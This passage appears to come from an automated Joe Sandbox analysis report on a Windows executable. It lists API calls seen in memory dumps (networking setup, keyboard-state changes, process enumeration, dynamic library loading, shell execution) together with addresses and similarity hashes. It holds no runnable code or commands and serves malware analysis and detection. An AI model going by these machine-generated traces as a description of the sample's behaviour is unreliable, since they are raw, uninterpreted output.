  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
• ___fls_getvalue@4.LIBCMT ref: 004140EC
  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
• ___fls_setvalue@8.LIBCMT ref: 004140FF
  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
• GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
• ExitThread.KERNEL32 ref: 0041410F
• GetCurrentThreadId.KERNEL32 ref: 00414115
• __freefls@4.LIBCMT ref: 00414135
• __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
• String ID:
• API String ID: 1925773019-0
• Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
• Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
• Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
• Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C
APIs
• VariantClear.OLEAUT32(00000038), ref: 004357C3
• VariantClear.OLEAUT32(00000058), ref: 004357C9
• VariantClear.OLEAUT32(00000068), ref: 004357CF
• VariantClear.OLEAUT32(00000078), ref: 004357D5
• VariantClear.OLEAUT32(00000088), ref: 004357DE
• VariantClear.OLEAUT32(00000048), ref: 004357E4
• VariantClear.OLEAUT32(00000098), ref: 004357ED
• VariantClear.OLEAUT32(000000A8), ref: 004357F6
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00464ADE
  • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
• inet_addr.WSOCK32(?), ref: 00464B1F
• gethostbyname.WSOCK32(?), ref: 00464B29
• _memset.LIBCMT ref: 00464B92
• GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
• GlobalFree.KERNEL32(00000000), ref: 00464CDE
• WSACleanup.WSOCK32 ref: 00464CE4
Similarity
• API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
• String ID:
• API String ID: 3424476444-0
APIs
• GetSystemMetrics.USER32(0000000F), ref: 00440B7B
Similarity
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-0
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
Similarity
• API ID: ConnectRegistry_wcslen
• String ID:
• API String ID: 535477410-0
APIs
  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
• _memset.LIBCMT ref: 004538C4
• GetMenuItemInfoW.USER32(?,?), ref: 004538EF
• _wcslen.LIBCMT ref: 00453960
• SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
• SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0
Strings
Similarity
• API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
• String ID: 0
• API String ID: 3530711334-4108050209
APIs
• GetCurrentProcessId.KERNEL32(?), ref: 00473A00
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
• CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01
Strings
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID: HH
• API String ID: 3488606520-2761332787
APIs
  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
• Ellipse.GDI32(?,?,?,00000000), ref: 00447463
• MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
• AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
• LineTo.GDI32(?,?), ref: 004474BF
• CloseFigure.GDI32(?), ref: 004474C6
• SetPixel.GDI32(?,?,?,?), ref: 004474D6
• Rectangle.GDI32(?,?), ref: 004474F3
Similarity
• API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
• String ID:
• API String ID: 4082120231-0
APIs
  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
• Ellipse.GDI32(?,?,?,00000000), ref: 00447463
• MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
• AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
• LineTo.GDI32(?,?), ref: 004474BF
• CloseFigure.GDI32(?), ref: 004474C6
• SetPixel.GDI32(?,?,?,?), ref: 004474D6
• Rectangle.GDI32(?,?), ref: 004474F3
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
• String ID:
• API String ID: 4082120231-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: AngleCloseEllipseFigureLineMovePixelRectangle
• String ID:
• API String ID: 288456094-0
APIs
• GetParent.USER32(?), ref: 004449B0
• GetKeyboardState.USER32(?), ref: 004449C3
• SetKeyboardState.USER32(?), ref: 00444A0F
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
• PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
• GetParent.USER32(?), ref: 00444BA9
• GetKeyboardState.USER32(?), ref: 00444BBC
• SetKeyboardState.USER32(?), ref: 00444C08
• PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
• PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
• PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
• PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: ConnectRegistry_wcslen
• String ID: HH
• API String ID: 535477410-2761332787
APIs
• _memset.LIBCMT ref: 00457C34
• _memset.LIBCMT ref: 00457CE8
• ShellExecuteExW.SHELL32(?), ref: 00457D34
  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
• CloseHandle.KERNEL32(?), ref: 00457DDD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
• String ID: <$@
• API String ID: 1325244542-1426351568
                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                                                                                                                            • __wsplitpath.LIBCMT ref: 004737E1
                                                                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                            • _wcscat.LIBCMT ref: 004737F6
                                                                                                                            • __wcsicoll.LIBCMT ref: 00473818
                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2547909840-0
                                                                                                                            • Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                                                            • Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
                                                                                                                            • Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                                                            • Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                                                                                                            • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                                                                                                            • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2354583917-0
                                                                                                                            • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                                                            • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                                                                                                                            • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                                                            • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 00463E68
                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
                                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 00463ECE
                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$Library$FreeLoad
                                                                                                                            • String ID: #v
                                                                                                                            • API String ID: 2449869053-554117064
                                                                                                                            • Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                                                            • Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
                                                                                                                            • Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                                                            • Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                            • GetMenu.USER32 ref: 004776AA
                                                                                                                            • GetMenuItemCount.USER32(00000000), ref: 004776CC
                                                                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                                                                                                                            • _wcslen.LIBCMT ref: 0047771A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$CountItemStringWindow_wcslen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1823500076-0
                                                                                                                            • Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                                                            • Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
                                                                                                                            • Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                                                            • Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9
                                                                                                                            APIs
                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                                                                                                                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                                                                                                                            • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                            • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                            • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 896007046-0
                                                                                                                            • Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                                                            • Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
                                                                                                                            • Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                                                            • Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                                                            • SendMessageW.USER32(02ED1BC0,000000F1,00000000,00000000), ref: 004414C6
                                                                                                                            • SendMessageW.USER32(02ED1BC0,000000F1,00000001,00000000), ref: 004414F1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 312131281-0
                                                                                                                            • Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                                                            • Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
                                                                                                                            • Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                                                            • Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 004484C4
                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
                                                                                                                            • IsMenu.USER32(?), ref: 0044857B
                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
                                                                                                                            • DrawMenuBar.USER32 ref: 004485E4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 3866635326-4108050209
                                                                                                                            • Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                                                            • Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
                                                                                                                            • Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                                                            • Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A
                                                                                                                            APIs
                                                                                                                            • InterlockedIncrement.KERNEL32 ref: 0047247C
                                                                                                                            • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00472499
                                                                                                                            • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                                                                                                                            • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Interlocked$DecrementIncrement$Sleep
